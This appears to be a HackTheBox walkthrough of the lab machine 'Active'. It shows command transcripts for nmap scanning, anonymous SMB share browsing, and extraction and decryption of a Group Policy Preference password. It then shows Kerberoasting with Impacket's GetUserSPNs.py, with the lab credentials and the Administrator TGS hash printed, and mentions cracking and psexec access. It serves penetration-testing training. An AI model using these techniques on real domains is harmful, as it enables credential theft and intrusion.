Hack The Box
HackTheBox “Active” Walkthrough
Active, an easy-level Windows OS machine on HackTheBox, started by discovering an open SMB share, initiating a journey through various stages of exploitation. Unveiling a Group Policy Preference password within the…
Active, an easy-level Windows OS machine on HackTheBox, started by discovering an open SMB share, initiating a journey through various stages of exploitation. Unveiling a Group Policy Preference password within the share led to decryption, ultimately revealing the Administrator user’s hash. Employing brute-force tactics, the hash was cracked, granting authentication as SYSTEM and enabling seamless maneuvering through the system.

Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
┌──(kali㉿kali)-[~/Desktop]└─$ sudo nmap -T4 -A -p- 10.10.10.100[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 17:03 ESTWarning: 10.10.10.100 giving up on port because retransmission cap hit (6).Nmap scan report for 10.10.10.100Host is up (0.11s latency).Not shown: 65329 closed tcp ports (reset), 183 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)| dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-16 22:27:17Z)135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)445/tcp open microsoft-ds?464/tcp open kpasswd5?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)3269/tcp open tcpwrapped5722/tcp open msdfsr?9389/tcp open mc-nmf .NET Message Framing47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-title: Not Found|_http-server-header: Microsoft-HTTPAPI/2.049152/tcp open msrpc Microsoft Windows RPC49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049158/tcp open unknown49165/tcp open unknown49170/tcp open unknown49171/tcp open unknownAggressive OS guesses: Microsoft Windows Server 2008 R2 (98%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows 8 (96%), Microsoft Windows 7 (96%), Microsoft Windows Vista Business (96%), Microsoft Windows Vista SP0 or SP1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Vista SP2 (96%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windowsHost script results:| smb2-time: | date: 2024-02-16T22:28:23|_ start_date: 2024-02-16T21:21:46| smb2-security-mode: | 2:1:0: |_ Message signing enabled and requiredTRACEROUTE (using port 3389/tcp)HOP RTT ADDRESS1 105.65 ms 10.10.14.12 103.78 ms 10.10.10.100OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 1607.76 secondsNumerous open ports and running services were detected including SMB, revealing the OS as Microsoft Windows Server 2008 R2 SP1, with the domain name “active.htb” noted. To facilitate access, the domain will be appended to /etc/hosts.
Now, we will list the SMB shares anonymously.

And we found the share “Replication”.
┌──(kali㉿kali)-[~/Desktop]└─$ smbclient //active.htb/ReplicationPassword for [WORKGROUP\kali]:Anonymous login successfulTry "help" to get a list of possible commands.smb: \> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \> cd active.htbsmb: \active.htb\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018 Policies D 0 Sat Jul 21 06:37:44 2018 scripts D 0 Wed Jul 18 14:48:57 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\> cd Policiessmb: \active.htb\Policies\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 06:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 06:37:44 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 GPT.INI A 23 Wed Jul 18 16:46:06 2018 Group Policy D 0 Sat Jul 21 06:37:44 2018 MACHINE D 0 Sat Jul 21 06:37:44 2018 USER D 0 Wed Jul 18 14:49:12 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINEsmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 Microsoft D 0 Sat Jul 21 06:37:44 2018 Preferences D 0 Sat Jul 21 06:37:44 2018 Registry.pol A 2788 Wed Jul 18 14:53:45 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferencessmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 Groups D 0 Sat Jul 21 06:37:44 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groupssmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 Groups.xml A 533 Wed Jul 18 16:46:06 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\>After exploring around, I discovered “group.xml” in a specific directory. Let’s download the file to examine its contents.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 Groups.xml A 533 Wed Jul 18 16:46:06 2018 5217023 blocks of size 4096. 277563 blocks availablesmb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xmlgetting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.2 KiloBytes/sec) (average 1.2 KiloBytes/sec)smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> exit ┌──(kali㉿kali)-[~/Desktop]└─$ cat Groups.xml <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>We discovered the username “active.htb\SVC_TGS” and its encrypted password, tagged as “cpassword.” Utilizing the tool “gpp-decrypt,” a Ruby program included in Kali Linux by default to decrypt it.

Using the obtained credentials (SVG_TGS:GPPstillStandingStrong2k18), we’ll attempt to access the Users share.

The Impacket collection includes a script named GetUserSPNs.py, designed to identify Service Principal Names (SPNs) linked to a specific user account. Running this script with the discovered credentials allows access to the requested valid Ticket-Granting Service (TGS) sets associated with these SPNs.
┌──(kali㉿kali)-[~/Desktop/impacket/examples]└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -requestImpacket v0.12.0.dev1+20240208.120203.63438ae7 - Copyright 2023 FortraServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2024-02-16 16:22:52.552948 [-] CCache file is not found. Skipping...$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$513817c4ac3cb618e26dcafd5c878e75$1a544ba6d87282ffe667f68e2680b0826d17aacb79ec775e425004be7dd9040b876516dcb743406f94425e20d523a8850d3e312989a78a50229b6402bd1e0aa18700c9335f5b06f7a76234b1500e72be11941b3547a545c5569123ce52b89a6bd68fe734eb525144a67a7d3b2e670df9426cabf4097e86b2f3e5c9b9eb49d7d4703e9b71f419b2c9bc718796fe65ee3d7930204b9def01b1e291bfdce9aa9c9d9078a5bd7b4b02479db39ea0732980ffc25d1431bf78078a7a0e826eccc5c87b7c471381c357fc98d3c595d6002ca476cbbf00ed6875398bd7e29f88081aaf053eb95d98b004f879f8c827ad4824e30d6e34b2e7ca1bd9bcd07aec2cf377ead5ac96804e4347dab86572d8d5bb2f3ca8f49a1edfe04a496e393f0b5c2c7d75ab1c382f75e313520ed6ccf8a1308fc1dc7b224f4db6797e7258b5e365b9604fd6331b4a0e64f34c292d7be533ace40b4f744ba230237f04b551143da6ab2477b1e54748007d974416b420578f78baa1b8250394f5701aceef36f4e1796adba1b20670f838034accd6040e1113b23deaa97a85bc3d5498ab1e69b104a98c2db9fef145e1674dab64cb1c5c2c4185ffb6304074ca74a2148d3617a8d8f6f3a646ee73cc3bd8478812da5c49e1736b4ffbb28dae3747c5bfe8809de4642e64d51956c21438b7636c9f9f7ff578c12b483546dbfe74ab6093c175713ee963bd267da590fe76d028d78ae7f4d5c3117f8d534e290d7d164119e1d6544c1949f0c8cf3ee9888041e18350d20df6c35f4c1af1e1fdf825470ddc84ca06524f6fe76cbde63712a66dc6f98939d73a157528d0e8fe68afda6b8c691faad7bd5fc367d38ce052f1d3c31c0a2cf9a40ee728858b3f8ae840f30d50b5eef77c71170e454ac13e54d9c86dee447f8c8d1ba31b0e481d52ab19beb5b3e2dd9a43da84741b47053e770f6f4645a6e313bd382d8af22c66aee9b8c777ed4caec3814982f8a1024d5808386958c3609296b4b093db2519a0d4204d0d1c5fd8d8ca9d925754c15496a0c2513115cca8e1f3dd7796eb11de75ab4c10ab8522ceeadc2bc5fd57884b0a2edb8e3e286a7c3c6e20d4515c98e9cb7929243b4eb07b8bcd6f6b9db8b1e40b0666dc5fad04809b4db7a497a265d283fa6042c7c333eb4be75fb9355902c41270949c169108fb7a70ef60685e1e1e7ddc05496de069af6dadf2d8f5110ad9997365fc39785355f60d8f6ee54a436d8039d8b0938d5fdae4e908a7We obtained a TGS from an Administrator SPN, our next step is to crack it and potentially escalate privileges. Let’s proceed using John The Ripper.

To access as the administrator, we’ll utilize psexec.py.

Cheers.